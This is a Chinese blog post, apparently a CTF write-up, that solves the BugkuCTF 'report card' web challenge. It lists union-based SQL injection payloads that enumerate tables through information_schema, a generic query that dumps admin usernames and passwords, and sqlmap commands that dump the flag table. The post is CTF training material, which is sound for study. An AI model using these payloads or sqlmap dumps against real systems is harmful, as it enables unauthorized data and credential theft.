bugkuctf 成绩单

最新推荐文章于 2024-04-15 01:58:25 发布
最新推荐文章于 2024-04-15 01:58:25 发布
阅读量661 收藏 3
点赞数 1
分类专栏: 网络安全web 文章标签: bugkuctf   成绩单

bugkuctf成绩单

用hackbar插件的post对它进行测试,之前测试了出现人的成绩单,所以测试4,或者更高.

id=1' order by 5#



没有回显,所以试试4

id=1' order by 4#


所以可以知道有四列
尝试联合查询
记得把前面的查询数据置空,写成id=0即可,显示正常,说明确确实实存在这四列数据

id=0' union select 1,2,3,4 #

在这里插入图片描述

下面我们开始猜解数据库名, 数据库的用户,数据库的版本(没有顺序,把1留出来只是因为表单看起来顺眼而已....)
id=0' union select 1,database(),user(),version() #


看到这里有库名,后面是user,和版本信息,所以我们要从库中找到我们想要的信息

id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),user(),version() #

注意,这里穿插一个知识点!!!!!!
union select 手工注入
mysql中的information_schema 结构用来存储数据库系统信息
information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表。
 
SCHEMATA 存储数据库名的,
关键字段:SCHEMA_NAME,表示数据库名称
TABLES 存储表名的
关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示表的名称
COLUMNS 存储字段名的
关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示所属的表的名称
COLUMN_NAME表示字段名
爆所有数据名
select group_concat(SCHEMA_NAME) from information_schema.schemata
得到当前库的所有表
select group_concat(table_name) from information_schema.tables where table_schema=database()
得到表中的字段名 将敏感的表进行16进制编码adminuser=0x61646D696E75736572
select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572
得到字段具体的值 select group_concat(username,0x3a,password) from adminuser
补充结束
根据表,得到字段名
id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'),user(),version()#

根据字段,得到字段的内容
id=0' union select 1,(select skctf_flag from fl4g) ,user(),version()#


得到flag
转自大佬的博客

方法二

sqlmap进行扫描
首先用bu’rpsuit进行抓包,得到的内容进行扫描:
输入查询1

在这里插入图片描述

然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id –current-db
-r –> 加载一个文件
-p –>指定参数
–current-db –>获取当前数据库名称(current前有两个-) 
python sqlmap.py -r "D:\注入\4.txt" -p id --dbs


可以看到,爆出两个库,下面进行爆表

python sqlmap.py -r "D:\注入\4.txt" -p id -D skctf_flag --tables

-D –>指定数据库名称
–tables –>列出数据库中的表(tables前有两个-)

可以看到当前数据库中有两个表,很明显,flag应该在fl4g表中,下面就是该爆出表中的字段了
python sqlmap.py -r "D:\注入\4.txt" -p id -D skctf_flag -T fl4g --columns

-T –>指定表名称
–columns –>列出表中的字段

知道字段名称后,想办法获取字段内容

python sqlmap.py -r "D:\注入\4.txt" -p id -D skctf_flag -T fl4g -C skctf_flag --dump

–dump –>列出字段数据(dump前有两个-)
-C 为指定列名称

得到flag

转自博客

舞动的獾
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
BugkuCTF 成绩单
3tu6b0rn的博客
04-02 1088
可以看出应该为sql联合注入 SQL注入之联合查询注入 要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4 构造语句 id=0' union select 1,2,3,4# 查询数据库 id=0' union select 1,2,3,database()#找到数据库 skctf_flag 查询数据表id=0...
bugku ctf 成绩单 (类似sql注入)
qq_42777804的博客
08-15 1007
原始界面    与以往的sql注入不同,直接在成绩查询栏中 注入     随便输入数字 发现居然会出现显示位 之后猜测应该有3个以上的显示位,因为成绩就已经有了3个 ?id=1' union select 1,2,3# 发现没有反应 那么就四个 ?id=1' union select 1,2,3,4#     发现了4个 ,那我们就用最后一个   先...
bugku成绩单(sql注入)writeup_sql注入 bugku,2024年最新只有搞网络安全开发的才知道
最新发布
2401_83946402的博客
04-15 297
元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
BugkuCTF】Web--成绩单
VZZmieshenquan的博客
02-09 1054
Description: 快来查查成绩吧 http://123.206.87.240:8002/chengjidan/ Solution: Flag:
BugkuCTF成绩单查询
qq_33505576的博客
06-27 727
SQL注入 https://blog.csdn.net/Langtuteng17/article/details/80666660
ctf-web-成绩查询
god_001的博客
04-13 1086
题目: 打开网页: 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时: 查看源代码: 发现,表单使用post方式提交,并且name="id" 猜测使用SQL注入 首先检测闭合方式: 分别post id=1' id=1" 发现post id=1"时,正常,post id=1'时无响应 应该是单引号 ' ' 闭合 再通过order by查询当前表列数: 于是可以判断...
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
BugKu之成绩单
Tle_Camouflage的博客
08-23 1439
成绩单(Web) 输入1并进行抓包。 然后按右键,点击copy to file保存文件,这里我保存到了C盘 333.txt。 然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id –current-db -r –> 加载一个文件 -p –>指定参数 –current-db –>获取当前数据库名称(current前有...
成绩单
qq_37443216的博客
07-14 290
bugku成绩单
qq_43677324的博客
03-09 892
bugku成绩单 详细解析 1,我们首先分别输入1,2,3, 均有输出 我们输入1’ 没有回响 因此我们可以判断存在sql注入 2.我们分别输入 1' order by 1# 1' order by 2# 1' order by 3# 1' order by 4# 均有回响 但是当我们使用 1' order by 5# 时,没有回响 因此我们可以根据此判断字段数为4 3, 之后就是最精彩的地...
CTF之Bugku 成绩单
weixin_41607190的博客
11-04 204
这道题很久之前就看到过了,现在才弄明白。。。 这么输入有回显 这么输入就没有了,为什么呢 当我们用查询语句 select * from emp order by x 假如emp这个表的字段有10个,那么x的值就只能是1-10 如果超过10,就不回显 所以说明显示只有4列,并没有隐藏什么 接下来就是爆库、爆表、包字段了 数据库叫skctf_flag,database()函数可以返回当前的数据...
BugkuCTF-web-成绩单 WP
会下雪的晴天
07-12 1643
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 个人收获:最基本的SQL注入 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 题目描述 解题传送门:http://123.206.87.240:8002/chengjidan/ 解题思路 查看源...
BugkuCTF之web题之成绩单
A_dmin的博客
12-07 6186
BugkuCTF之web题之成绩单 1.向其中分别输入1,2,3…发现可以查询,当向其中输入1’时,程序不能查询,根据观察题目,猜测应该可以大概判断出有四个字段 2.在成绩查询处开始爆数据库名,输入0’ union select database(),2,3,4 # 得到: 说明数据库的名为skctf_flag 3.在成绩查询处开始爆数据库表名,输入0’ union select table_...
bugku之成绩单
Seaern的博客
07-25 155
题目链接 打开链接发现是一个表单 分别输入1,2,3有数据传回 那就应该是 sql注入呀~ 1.首先爆字段 在输入框提交 id=1' order by 4# 正常返回数据 id=1' order by 5# 返回空 即可确定字段数为4 2.爆数据库名 0' union select 1,database(),user(),version()# 3.根据数据库名查询表名 id=0' ...
web——成绩单(90)——Bugku
Zichel77的博客
08-07 349
0×00 靶场链接 http://123.206.87.240:8002/chengjidan/ 0×01 题目描述 应该就是一个注入题了 0×02 解题过程 输入1 输入2 输入3 输入4 说明一共就3个字段 现在尝试一下手注 输入1'--+ 依旧报错 再试试1' 依旧报错 再试试1'# 没有报错了 这说明本题--+被过滤掉了 再来看数据库有几列 1234对应的数据库分别有:姓名,Math,English,C...
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值